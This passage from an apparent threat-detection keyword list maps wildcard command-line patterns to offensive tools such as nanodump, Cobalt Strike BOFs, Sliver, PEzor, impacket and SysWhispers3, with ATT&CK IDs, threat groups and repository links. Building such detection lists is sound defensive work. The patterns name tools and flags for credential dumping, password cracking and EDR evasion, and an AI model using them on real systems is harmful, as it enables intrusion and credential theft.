- T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* flash.bat*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -fluctuate=NA -sleep=*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -fluctuate=RW -sleep=*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* flume-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --flush-attacks*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"* follina.py *","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" +"* -force-forwardable","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --force-kerb *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --force-ps32","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* forgeTGT(*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"* --fork --write *.dmp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* --format exe * --jitter *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"* --format kirbi*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* -format=bof *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -format=bof -cleanup *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -format=dotnet -sleep=*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -format=dotnet-pinvoke *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* --format=krb5asrep* --wordlist=*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --format=netntlmv2 *.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --format=NT -w=*_password.txt*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -format=reflective-dll *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -format=service-dll *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -format=service-exe *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* fox-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* freelancer-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* Freeze.rs/*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"* ftp-anon.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ftp-bounce.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ftp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ftp-libopie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ftp-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* ftp-proftpd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* FtpSniffer *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* ftp-syst.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ftp-vsftpd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ftp-vuln-cve2010-4221.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* FudgeC2 *","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"* -FullPrivs * ","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --functions NtProtectVirtualMemory*NtWriteVirtualMemory -o syscalls_mem*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"* fuzz -u * -p *--target*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"* FUZZ:FUZZ *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* --fuzzers addition*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - 